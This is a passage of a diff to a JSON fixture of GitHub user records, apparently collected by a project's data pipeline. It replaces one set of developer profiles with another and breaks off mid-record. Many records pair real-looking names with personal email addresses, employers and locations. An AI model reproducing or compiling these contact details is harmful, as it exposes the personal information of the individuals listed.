"wholroyd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92298117?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147990?v=4", + "company": "Google", + "location": "Raleigh, NC", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-10-11T08:14:41Z", - "updated_at": "2024-05-08T06:56:41Z", - "node_id": "U_kgDOBYBbhQ", - "bio": "", + "following_count": 53, + "followers_count": 31, + "public_gists_count": 24, + "public_repositories_count": 108, + "created_at": "2009-11-02T21:53:44Z", + "updated_at": "2024-01-09T16:41:09Z", + "node_id": "MDQ6VXNlcjE0Nzk5MA==", + "bio": "Run scalable/distributed services at Google.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1336, + "pk": 6608, "fields": { - "nest_created_at": "2024-09-11T23:20:02.450Z", - "nest_updated_at": "2024-09-11T23:20:02.450Z", - "name": "Alberto Monteiro", - "login": "AlbertoMonteiro", - "email": "alberto.monteiro@live.com", - "avatar_url": "https://avatars.githubusercontent.com/u/836496?v=4", - "company": "Banco Carrefour", - "location": "Fotaleza", + "nest_created_at": "2024-09-22T07:47:14.274Z", + "nest_updated_at": "2024-09-22T18:49:47.732Z", + "name": "Thomas Ardal", + "login": "ThomasArdal", + "email": "thomasardal@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/563206?v=4", + "company": "elmah.io", + "location": "Denmark", "collaborators_count": 0, - "following_count": 93, - "followers_count": 220, - "public_gists_count": 130, - "public_repositories_count": 209, - "created_at": "2011-06-08T02:19:05Z", - "updated_at": "2024-08-27T11:33:48Z", - "node_id": "MDQ6VXNlcjgzNjQ5Ng==", - "bio": "I am Software Architect, whose main area of knowledge are in .NET with C#, writing Web Apps deploying in Cloud.", + "following_count": 2, + "followers_count": 48, + "public_gists_count": 64, + "public_repositories_count": 48, + "created_at": "2011-01-13T18:03:26Z", + "updated_at": "2024-09-21T11:23:17Z", + "node_id": "MDQ6VXNlcjU2MzIwNg==", + "bio": "I'm the founder of @elmahio - a cloud-based software as a service product for implementing effective error management in .NET web apps.", "is_hireable": false, - "twitter_username": "AIbertoMonteiro" + "twitter_username": "ThomasArdal" } }, { "model": "github.user", - "pk": 1337, + "pk": 6609, "fields": { - "nest_created_at": "2024-09-11T23:20:03.678Z", - "nest_updated_at": "2024-09-11T23:20:03.678Z", - "name": "", - "login": "msherms2", + "nest_created_at": "2024-09-22T07:47:14.589Z", + "nest_updated_at": "2024-09-22T18:49:48.046Z", + "name": "Oleg Valter", + "login": "Oaphi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100243291?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34833340?v=4", + "company": "Rocket", + "location": "Saint Petersburg", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-02-22T22:37:11Z", - "updated_at": "2024-06-13T20:48:34Z", - "node_id": "U_kgDOBfmXWw", + "following_count": 58, + "followers_count": 21, + "public_gists_count": 23, + "public_repositories_count": 48, + "created_at": "2017-12-25T10:40:04Z", + "updated_at": "2024-07-25T09:51:05Z", + "node_id": "MDQ6VXNlcjM0ODMzMzQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393678,124 +651152,124 @@ }, { "model": "github.user", - "pk": 1338, + "pk": 6610, "fields": { - "nest_created_at": "2024-09-11T23:20:05.369Z", - "nest_updated_at": "2024-09-11T23:20:05.369Z", - "name": "Thomas Hauser", - "login": "thomashauser", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16082684?v=4", + "nest_created_at": "2024-09-22T07:47:14.900Z", + "nest_updated_at": "2024-09-22T18:49:48.368Z", + "name": "Hayssam Saleh", + "login": "hayssams", + "email": "hayssam@saleh.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/2473992?v=4", "company": "", - "location": "", + "location": "Paris", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2015-11-30T12:51:48Z", - "updated_at": "2024-03-25T18:16:54Z", - "node_id": "MDQ6VXNlcjE2MDgyNjg0", + "public_repositories_count": 39, + "created_at": "2012-10-02T18:49:14Z", + "updated_at": "2024-09-08T10:44:17Z", + "node_id": "MDQ6VXNlcjI0NzM5OTI=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "hayssams" } }, { "model": "github.user", - "pk": 1339, + "pk": 6611, "fields": { - "nest_created_at": "2024-09-11T23:20:24.767Z", - "nest_updated_at": "2024-09-16T22:29:06.173Z", - "name": "James Thompson", - "login": "thompson-tomo", - "email": "wemicroit@outlook.com", - "avatar_url": "https://avatars.githubusercontent.com/u/19771933?v=4", - "company": "@wemicroit ", - "location": "Melbourne, Victoria, Australia", + "nest_created_at": "2024-09-22T07:47:15.247Z", + "nest_updated_at": "2024-09-22T18:49:48.680Z", + "name": "Christian Svensson", + "login": "csvn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8770194?v=4", + "company": "@voyado", + "location": "Lund, Sweden", "collaborators_count": 0, - "following_count": 19, - "followers_count": 11, + "following_count": 1, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 152, - "created_at": "2016-06-06T06:53:31Z", - "updated_at": "2024-09-03T06:43:17Z", - "node_id": "MDQ6VXNlcjE5NzcxOTMz", - "bio": "", - "is_hireable": true, + "public_repositories_count": 6, + "created_at": "2014-09-14T18:34:46Z", + "updated_at": "2024-08-15T10:00:03Z", + "node_id": "MDQ6VXNlcjg3NzAxOTQ=", + "bio": "https://gitlab.com/csvn", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1340, + "pk": 6612, "fields": { - "nest_created_at": "2024-09-11T23:20:30.907Z", - "nest_updated_at": "2024-09-11T23:20:30.907Z", - "name": "Götz Tibor", - "login": "gotztibor", - "email": "gotz.tibor@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/24914675?v=4", + "nest_created_at": "2024-09-22T07:47:15.555Z", + "nest_updated_at": "2024-09-22T18:49:49.002Z", + "name": "Brad Wilson", + "login": "bradwilson", + "email": "dotnetguy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16944?v=4", "company": "", - "location": "", + "location": "Pacific Northwest (Cascadia)", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-01-04T11:41:39Z", - "updated_at": "2023-11-24T20:13:38Z", - "node_id": "MDQ6VXNlcjI0OTE0Njc1", - "bio": "", + "followers_count": 614, + "public_gists_count": 66, + "public_repositories_count": 11, + "created_at": "2008-07-13T17:54:37Z", + "updated_at": "2024-09-20T11:22:18Z", + "node_id": "MDQ6VXNlcjE2OTQ0", + "bio": "Recovering former developer with a vague interest in things related to C# and F# | @xunit's caretaker", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1341, + "pk": 6613, "fields": { - "nest_created_at": "2024-09-11T23:20:32.560Z", - "nest_updated_at": "2024-09-11T23:20:32.560Z", - "name": "Kieran Foot", - "login": "KieranFoot", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5846535?v=4", - "company": "ConnX Business Solutiond Ltd", - "location": "United Kingdom", + "nest_created_at": "2024-09-22T07:47:15.868Z", + "nest_updated_at": "2024-09-22T18:49:49.317Z", + "name": "Ashley Stanton-Nurse", + "login": "analogrelay", + "email": "contact@analogrelay.net", + "avatar_url": "https://avatars.githubusercontent.com/u/7574?v=4", + "company": "@microsoft ", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 8, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2013-11-03T23:51:57Z", - "updated_at": "2024-09-04T08:31:51Z", - "node_id": "MDQ6VXNlcjU4NDY1MzU=", - "bio": "Lead Software Developer", - "is_hireable": true, - "twitter_username": "" + "following_count": 5, + "followers_count": 472, + "public_gists_count": 33, + "public_repositories_count": 312, + "created_at": "2008-04-16T14:40:04Z", + "updated_at": "2024-09-18T20:50:18Z", + "node_id": "MDQ6VXNlcjc1NzQ=", + "bio": "Non-Digital. I write Code for @azure at Microsoft. Previously @dotnet and @github", + "is_hireable": false, + "twitter_username": "analogrelay" } }, { "model": "github.user", - "pk": 1342, + "pk": 6614, "fields": { - "nest_created_at": "2024-09-11T23:20:35.488Z", - "nest_updated_at": "2024-09-11T23:20:37.152Z", - "name": "Andrei Chasovskikh", - "login": "andreycha", + "nest_created_at": "2024-09-22T07:47:16.180Z", + "nest_updated_at": "2024-09-22T18:49:49.636Z", + "name": "", + "login": "jrylan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1696046?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/178806156?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 27, - "public_gists_count": 3, - "public_repositories_count": 18, - "created_at": "2012-05-01T16:56:07Z", - "updated_at": "2024-08-06T10:44:27Z", - "node_id": "MDQ6VXNlcjE2OTYwNDY=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-08-19T14:06:35Z", + "updated_at": "2024-08-19T14:06:55Z", + "node_id": "U_kgDOCqhdjA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393803,49 +651277,74 @@ }, { "model": "github.user", - "pk": 1343, + "pk": 6615, "fields": { - "nest_created_at": "2024-09-11T23:20:38.808Z", - "nest_updated_at": "2024-09-11T23:20:38.808Z", - "name": "Bronislav S.", - "login": "Recurse-blip", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64206544?v=4", + "nest_created_at": "2024-09-22T07:47:16.499Z", + "nest_updated_at": "2024-09-22T18:49:49.951Z", + "name": "Yuichi Nukiyama", + "login": "YuichiNukiyama", + "email": "oscar.wilde84@hotmail.co.jp", + "avatar_url": "https://avatars.githubusercontent.com/u/9623009?v=4", "company": "", - "location": "Ukraine", + "location": "Tokyo, Japan", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-04-23T12:53:11Z", - "updated_at": "2024-06-28T14:55:56Z", - "node_id": "MDQ6VXNlcjY0MjA2NTQ0", - "bio": "DevOps - Software Engineer", - "is_hireable": false, + "following_count": 9, + "followers_count": 26, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2014-11-08T07:55:29Z", + "updated_at": "2024-08-05T02:51:37Z", + "node_id": "MDQ6VXNlcjk2MjMwMDk=", + "bio": "C#, TypeScript, JavaScript", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1344, + "pk": 6616, "fields": { - "nest_created_at": "2024-09-11T23:20:41.725Z", - "nest_updated_at": "2024-09-11T23:20:41.725Z", - "name": "", - "login": "Kubana", + "nest_created_at": "2024-09-22T07:47:16.810Z", + "nest_updated_at": "2024-09-22T18:49:50.258Z", + "name": "Simon Binder", + "login": "simolus3", + "email": "oss@simonbinder.eu", + "avatar_url": "https://avatars.githubusercontent.com/u/5738860?v=4", + "company": "", + "location": "Darmstadt", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 405, + "public_gists_count": 21, + "public_repositories_count": 76, + "created_at": "2013-10-21T15:33:14Z", + "updated_at": "2024-09-13T18:25:45Z", + "node_id": "MDQ6VXNlcjU3Mzg4NjA=", + "bio": "", + "is_hireable": true, + "twitter_username": "dersimolus" + } +}, +{ + "model": "github.user", + "pk": 6617, + "fields": { + "nest_created_at": "2024-09-22T07:47:17.128Z", + "nest_updated_at": "2024-09-22T18:49:50.604Z", + "name": "ShimiTal", + "login": "ShimiT", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9918282?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13747712?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-11-23T19:40:40Z", - "updated_at": "2024-08-12T08:08:26Z", - "node_id": "MDQ6VXNlcjk5MTgyODI=", + "following_count": 6, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2015-08-11T11:52:04Z", + "updated_at": "2024-05-06T15:03:40Z", + "node_id": "MDQ6VXNlcjEzNzQ3NzEy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393853,74 +651352,74 @@ }, { "model": "github.user", - "pk": 1345, + "pk": 6618, "fields": { - "nest_created_at": "2024-09-11T23:20:43.382Z", - "nest_updated_at": "2024-09-11T23:20:43.382Z", - "name": "Volkmar Rigo", - "login": "VolkmarR", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9860916?v=4", - "company": "Infominds AG", - "location": "Bruneck, Italy", + "nest_created_at": "2024-09-22T07:47:17.437Z", + "nest_updated_at": "2024-09-22T18:49:50.936Z", + "name": "Matt Ellis", + "login": "citizenmatt", + "email": "m.t.ellis@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/222659?v=4", + "company": "@JetBrains ", + "location": "UK", "collaborators_count": 0, "following_count": 16, - "followers_count": 9, - "public_gists_count": 1, - "public_repositories_count": 41, - "created_at": "2014-11-20T08:43:17Z", - "updated_at": "2024-09-09T19:44:24Z", - "node_id": "MDQ6VXNlcjk4NjA5MTY=", - "bio": "I do things with computers... ", + "followers_count": 233, + "public_gists_count": 21, + "public_repositories_count": 141, + "created_at": "2010-03-14T23:01:44Z", + "updated_at": "2024-09-22T09:13:05Z", + "node_id": "MDQ6VXNlcjIyMjY1OQ==", + "bio": "", "is_hireable": false, - "twitter_username": "VolkmarRigo" + "twitter_username": "citizenmatt" } }, { "model": "github.user", - "pk": 1346, + "pk": 6619, "fields": { - "nest_created_at": "2024-09-11T23:20:45.519Z", - "nest_updated_at": "2024-09-14T19:26:51.142Z", - "name": "Peter Cullen", - "login": "petercullen68", + "nest_created_at": "2024-09-22T07:47:17.783Z", + "nest_updated_at": "2024-09-22T18:49:51.253Z", + "name": "Charles Korn", + "login": "charleskorn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42790047?v=4", - "company": "Infor", - "location": "United States", + "avatar_url": "https://avatars.githubusercontent.com/u/4017646?v=4", + "company": "Grafana Labs", + "location": "Melbourne", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-08-29T00:44:50Z", - "updated_at": "2024-07-31T11:46:26Z", - "node_id": "MDQ6VXNlcjQyNzkwMDQ3", - "bio": "Principal S/W Engineer @ Infor Global Solutions.", + "following_count": 3, + "followers_count": 74, + "public_gists_count": 5, + "public_repositories_count": 103, + "created_at": "2013-03-31T06:16:25Z", + "updated_at": "2024-09-20T12:03:38Z", + "node_id": "MDQ6VXNlcjQwMTc2NDY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1347, + "pk": 6620, "fields": { - "nest_created_at": "2024-09-11T23:20:47.237Z", - "nest_updated_at": "2024-09-18T18:56:37.143Z", - "name": "", - "login": "SagarKodam", + "nest_created_at": "2024-09-22T07:47:18.090Z", + "nest_updated_at": "2024-09-22T18:49:51.562Z", + "name": "Dan Liu", + "login": "danliu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43883194?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1087852?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 13, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2018-10-05T13:01:31Z", - "updated_at": "2024-03-21T06:32:24Z", - "node_id": "MDQ6VXNlcjQzODgzMTk0", + "created_at": "2011-09-28T19:24:25Z", + "updated_at": "2023-01-27T19:07:40Z", + "node_id": "MDQ6VXNlcjEwODc4NTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393928,74 +651427,74 @@ }, { "model": "github.user", - "pk": 1348, + "pk": 6621, "fields": { - "nest_created_at": "2024-09-11T23:21:31.931Z", - "nest_updated_at": "2024-09-11T23:21:31.931Z", - "name": "", - "login": "tucker01", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37446232?v=4", + "nest_created_at": "2024-09-22T07:47:18.409Z", + "nest_updated_at": "2024-09-22T18:49:51.870Z", + "name": "Bruno Logerfo", + "login": "Logerfo", + "email": "bruno@logerfo.tk", + "avatar_url": "https://avatars.githubusercontent.com/u/19306384?v=4", "company": "", - "location": "", + "location": "Brazil", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 5, - "public_repositories_count": 6, - "created_at": "2018-03-16T13:44:52Z", - "updated_at": "2024-02-13T15:23:25Z", - "node_id": "MDQ6VXNlcjM3NDQ2MjMy", - "bio": "", + "following_count": 80, + "followers_count": 47, + "public_gists_count": 3, + "public_repositories_count": 64, + "created_at": "2016-05-11T12:32:30Z", + "updated_at": "2024-08-16T00:01:06Z", + "node_id": "MDQ6VXNlcjE5MzA2Mzg0", + "bio": "Opinions are mine.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1349, + "pk": 6622, "fields": { - "nest_created_at": "2024-09-11T23:21:32.775Z", - "nest_updated_at": "2024-09-11T23:21:32.775Z", - "name": "Cameron Griffin", - "login": "electricgull", + "nest_created_at": "2024-09-22T07:47:18.762Z", + "nest_updated_at": "2024-09-22T18:49:52.181Z", + "name": "David Fowler", + "login": "davidfowl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16562085?v=4", - "company": "", - "location": "Raleigh, NC", + "avatar_url": "https://avatars.githubusercontent.com/u/95136?v=4", + "company": "Microsoft", + "location": "Bellevue, WA", "collaborators_count": 0, - "following_count": 4, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-01-05T16:36:27Z", - "updated_at": "2024-08-13T11:27:47Z", - "node_id": "MDQ6VXNlcjE2NTYyMDg1", - "bio": "Security Automation Engineer", + "following_count": 9, + "followers_count": 12694, + "public_gists_count": 157, + "public_repositories_count": 255, + "created_at": "2009-06-13T22:27:06Z", + "updated_at": "2024-09-09T05:54:43Z", + "node_id": "MDQ6VXNlcjk1MTM2", + "bio": "Distinguished Engineer 🧐 at Microsoft on the ASP.NET team, Creator of SignalR", "is_hireable": false, - "twitter_username": "emwav" + "twitter_username": "davidfowl" } }, { "model": "github.user", - "pk": 1350, + "pk": 6623, "fields": { - "nest_created_at": "2024-09-11T23:21:33.592Z", - "nest_updated_at": "2024-09-11T23:21:33.592Z", - "name": "Rose Judge", - "login": "rnjudge", + "nest_created_at": "2024-09-22T07:47:19.090Z", + "nest_updated_at": "2024-09-22T18:49:52.488Z", + "name": "Dmytro Demensky", + "login": "demensky", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12040351?v=4", - "company": "@vmware", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10235949?v=4", + "company": "", + "location": "Ukraine", "collaborators_count": 0, - "following_count": 2, - "followers_count": 78, + "following_count": 16, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2015-04-20T21:12:27Z", - "updated_at": "2024-09-04T11:26:56Z", - "node_id": "MDQ6VXNlcjEyMDQwMzUx", + "public_repositories_count": 38, + "created_at": "2014-12-18T18:53:40Z", + "updated_at": "2024-09-19T14:23:22Z", + "node_id": "MDQ6VXNlcjEwMjM1OTQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394003,124 +651502,124 @@ }, { "model": "github.user", - "pk": 1351, + "pk": 6624, "fields": { - "nest_created_at": "2024-09-11T23:21:34.433Z", - "nest_updated_at": "2024-09-11T23:21:34.433Z", - "name": "Wessel Terpstra", - "login": "wterpstra", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4698201?v=4", - "company": "Independent", - "location": "Zuidoostbeemster, Netherlands", + "nest_created_at": "2024-09-22T07:47:19.406Z", + "nest_updated_at": "2024-09-22T18:49:52.827Z", + "name": "Fedor Korotkov", + "login": "fkorotkov", + "email": "fedor.korotkov@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/989066?v=4", + "company": "@cirruslabs ", + "location": "NYC", "collaborators_count": 0, - "following_count": 7, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2013-06-14T13:21:29Z", - "updated_at": "2024-09-05T07:46:41Z", - "node_id": "MDQ6VXNlcjQ2OTgyMDE=", - "bio": "", + "following_count": 27, + "followers_count": 217, + "public_gists_count": 15, + "public_repositories_count": 308, + "created_at": "2011-08-18T16:10:42Z", + "updated_at": "2024-09-20T18:23:17Z", + "node_id": "MDQ6VXNlcjk4OTA2Ng==", + "bio": "Typing things at @cirruslabs. Trying to improve work routines of fellow engineers.\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1352, + "pk": 6625, "fields": { - "nest_created_at": "2024-09-11T23:21:35.247Z", - "nest_updated_at": "2024-09-11T23:21:35.247Z", - "name": "Roman Ledermann", - "login": "roman-ledermann-erni", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8698772?v=4", + "nest_created_at": "2024-09-22T07:47:19.714Z", + "nest_updated_at": "2024-09-22T18:49:53.145Z", + "name": "Gautier de Saint Martin Lacaze", + "login": "jabby", + "email": "gautier@jabby-techs.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/1883932?v=4", "company": "", - "location": "", + "location": "Nantes, France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-09-08T17:06:10Z", - "updated_at": "2024-02-08T14:07:54Z", - "node_id": "MDQ6VXNlcjg2OTg3NzI=", - "bio": "", + "following_count": 22, + "followers_count": 27, + "public_gists_count": 6, + "public_repositories_count": 85, + "created_at": "2012-06-23T09:54:16Z", + "updated_at": "2023-12-11T20:59:45Z", + "node_id": "MDQ6VXNlcjE4ODM5MzI=", + "bio": "Freelance Java(Script). Maintainer of @gitlab4j", "is_hireable": false, - "twitter_username": "" + "twitter_username": "darkjabberwock" } }, { "model": "github.user", - "pk": 1353, + "pk": 6626, "fields": { - "nest_created_at": "2024-09-11T23:21:42.209Z", - "nest_updated_at": "2024-09-11T23:21:42.209Z", - "name": "", - "login": "zabulus", + "nest_created_at": "2024-09-22T07:47:20.026Z", + "nest_updated_at": "2024-09-22T18:49:53.464Z", + "name": "Hugo van Kemenade", + "login": "hugovk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2720011?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1324225?v=4", + "company": "@deadsetbit", + "location": "Helsinki, Finland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 4, - "public_repositories_count": 49, - "created_at": "2012-11-04T12:15:52Z", - "updated_at": "2024-07-14T03:08:04Z", - "node_id": "MDQ6VXNlcjI3MjAwMTE=", - "bio": "", + "following_count": 236, + "followers_count": 794, + "public_gists_count": 31, + "public_repositories_count": 1214, + "created_at": "2012-01-12T09:14:31Z", + "updated_at": "2024-09-22T05:22:53Z", + "node_id": "MDQ6VXNlcjEzMjQyMjU=", + "bio": "Python 3.14 & 3.15 release manager, core developer, PSF Fellow, open-source maintainer, PEP editor, NaNoGenMo organiser", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1354, + "pk": 6627, "fields": { - "nest_created_at": "2024-09-11T23:22:38.998Z", - "nest_updated_at": "2024-09-11T23:42:14.805Z", - "name": "Sambhav Kothari", - "login": "samj1912", + "nest_created_at": "2024-09-22T07:47:20.338Z", + "nest_updated_at": "2024-09-22T18:49:53.769Z", + "name": "Josh Pinkney", + "login": "JPinkney", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16130816?v=4", - "company": "@bloomberg", - "location": "London, UK", + "avatar_url": "https://avatars.githubusercontent.com/u/8839537?v=4", + "company": "", + "location": "Toronto, Canada", "collaborators_count": 0, - "following_count": 17, - "followers_count": 256, - "public_gists_count": 36, - "public_repositories_count": 166, - "created_at": "2015-12-03T07:48:03Z", - "updated_at": "2024-08-10T10:47:27Z", - "node_id": "MDQ6VXNlcjE2MTMwODE2", - "bio": "AI Team lead and open-sourcerer. Maintainer for various CNCF and Python projects.", + "following_count": 19, + "followers_count": 49, + "public_gists_count": 67, + "public_repositories_count": 94, + "created_at": "2014-09-20T03:17:52Z", + "updated_at": "2024-08-23T11:32:39Z", + "node_id": "MDQ6VXNlcjg4Mzk1Mzc=", + "bio": "This is my personal account. My work account is: @jpinkney-aws", "is_hireable": false, - "twitter_username": "_sambhavkothari" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1355, + "pk": 6628, "fields": { - "nest_created_at": "2024-09-11T23:22:43.860Z", - "nest_updated_at": "2024-09-11T23:22:43.860Z", + "nest_created_at": "2024-09-22T07:47:20.656Z", + "nest_updated_at": "2024-09-22T18:49:54.079Z", "name": "", - "login": "seb06cai", + "login": "HookyQR", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16827761?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14353068?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 31, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-01-21T23:49:35Z", - "updated_at": "2024-08-05T21:29:00Z", - "node_id": "MDQ6VXNlcjE2ODI3NzYx", + "public_repositories_count": 47, + "created_at": "2015-09-18T20:20:05Z", + "updated_at": "2023-09-22T03:40:57Z", + "node_id": "MDQ6VXNlcjE0MzUzMDY4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394128,49 +651627,49 @@ }, { "model": "github.user", - "pk": 1356, + "pk": 6629, "fields": { - "nest_created_at": "2024-09-11T23:22:46.760Z", - "nest_updated_at": "2024-09-11T23:22:46.760Z", + "nest_created_at": "2024-09-22T07:47:20.971Z", + "nest_updated_at": "2024-09-22T18:49:54.382Z", "name": "", - "login": "asponzan", + "login": "BehindTheMath", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109351244?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9314934?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-07-15T11:08:47Z", - "updated_at": "2024-07-30T15:52:13Z", - "node_id": "U_kgDOBoSRTA", + "followers_count": 15, + "public_gists_count": 9, + "public_repositories_count": 33, + "created_at": "2014-10-20T06:24:07Z", + "updated_at": "2023-11-05T20:31:31Z", + "node_id": "MDQ6VXNlcjkzMTQ5MzQ=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1357, + "pk": 6630, "fields": { - "nest_created_at": "2024-09-11T23:22:47.579Z", - "nest_updated_at": "2024-09-11T23:22:47.579Z", + "nest_created_at": "2024-09-22T07:47:21.301Z", + "nest_updated_at": "2024-09-22T18:49:54.692Z", "name": "", - "login": "Nicolas-Peiffer", + "login": "scribam", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102670102?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25406440?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 0, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-03-30T12:29:57Z", - "updated_at": "2024-08-08T14:09:12Z", - "node_id": "U_kgDOBh6fFg", + "public_repositories_count": 10, + "created_at": "2017-01-28T18:24:41Z", + "updated_at": "2024-09-10T17:13:43Z", + "node_id": "MDQ6VXNlcjI1NDA2NDQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394178,49 +651677,49 @@ }, { "model": "github.user", - "pk": 1358, + "pk": 6631, "fields": { - "nest_created_at": "2024-09-11T23:22:48.424Z", - "nest_updated_at": "2024-09-18T18:56:53.195Z", - "name": "Keith Zantow", - "login": "kzantow", - "email": "keith@zantow.us", - "avatar_url": "https://avatars.githubusercontent.com/u/3009477?v=4", + "nest_created_at": "2024-09-22T07:47:21.619Z", + "nest_updated_at": "2024-09-22T18:49:55.000Z", + "name": "", + "login": "richma-ms", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54086435?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 54, - "public_gists_count": 3, - "public_repositories_count": 29, - "created_at": "2012-12-10T17:12:11Z", - "updated_at": "2024-04-11T03:14:39Z", - "node_id": "MDQ6VXNlcjMwMDk0Nzc=", - "bio": "I help build fast, pretty things! ... or is it pretty things, fast?", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-08-14T00:00:51Z", + "updated_at": "2024-05-12T22:22:41Z", + "node_id": "MDQ6VXNlcjU0MDg2NDM1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1359, + "pk": 6632, "fields": { - "nest_created_at": "2024-09-11T23:22:50.115Z", - "nest_updated_at": "2024-09-11T23:22:50.115Z", - "name": "Dario Andreani", - "login": "darioandre", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77160283?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:21.940Z", + "nest_updated_at": "2024-09-22T18:49:55.308Z", + "name": "Wesley Wigham", + "login": "weswigham", + "email": "wwigham@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2932786?v=4", + "company": "Microsoft", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - 